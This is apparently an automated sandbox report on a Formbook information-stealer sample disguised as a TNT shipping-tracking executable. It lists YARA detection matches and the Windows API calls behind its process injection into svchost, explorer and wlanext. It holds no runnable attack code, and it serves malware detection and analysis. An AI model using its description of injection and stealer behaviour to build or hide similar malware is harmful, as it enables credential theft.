          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

E-Banking Fraud

Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.3861610506.0000000010C89000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d, Author: unknown
          Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: TNT AWB TRACKING DETAILS.exe PID: 7420, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: wlanext.exe PID: 7568, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A330 NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A3E0 NtReadFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A460 NtClose
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A510 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A3DA NtReadFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A45B NtClose
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A50A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472B60 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472BF0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472AD0 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472F30 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472FE0 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472F90 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472FB0 NtResumeThread,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472E80 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472D10 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472D30 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472DD0 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472CA0 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03474340 NtSetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03474650 NtSuspendThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472BE0 NtQueryValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472C60 NtCreateKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472C70 NtFreeVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473090 NtSetValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034735C0 NtCreateMutant
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034739B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473D70 NtOpenThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384A042 NtQueryInformationProcess
          Source: C:\Windows\explorer.exe | Code function: 3_2_10C72E12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe | Code function: 3_2_10C71232 NtCreateFile
          Source: C:\Windows\explorer.exe | Code function: 3_2_10C72E0A NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_006FF267 CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912BF0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912BE0 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912B60 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912AD0 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912FE0 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912F30 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912DD0 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912D10 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912CA0 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912C70 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912C60 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039135C0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03914340 NtSetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03914650 NtSuspendThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03912C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03913090 NtSetValueKey
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03913010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039139B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03913D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03913D70 NtOpenThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EA330 NtCreateFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EA3E0 NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EA510 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EA460 NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EA3DA NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EA50A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EA45B NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03689BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0368A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03689BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0368A042 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00431BE8 GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004096A00_2_004096A0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0042200C0_2_0042200C
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0041A2170_2_0041A217
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004122160_2_00412216
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0042435D0_2_0042435D
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004033C00_2_004033C0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044F4300_2_0044F430
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004125E80_2_004125E8
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044663B0_2_0044663B
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004138010_2_00413801
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0042096F0_2_0042096F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004129D00_2_004129D0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004119E30_2_004119E3
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0041C9AE0_2_0041C9AE
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0047EA6F0_2_0047EA6F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0040FA100_2_0040FA10
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044EB5F0_2_0044EB5F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00423C810_2_00423C81
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00411E780_2_00411E78
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00442E0C0_2_00442E0C
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00420EC00_2_00420EC0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044CF170_2_0044CF17
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00444FD20_2_00444FD2
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_03F396980_2_03F39698
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_03F3CEA00_2_03F3CEA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E0C02_2_0041E0C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2AA2_2_0041E2AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E3342_2_0041E334
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DBD22_2_0041DBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D5732_2_0041D573
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EE602_2_0041EE60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E1A2_2_00409E1A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E61E2_2_0041E61E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E6392_2_0041E639
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DF122_2_0041DF12
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F41A22_2_034F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
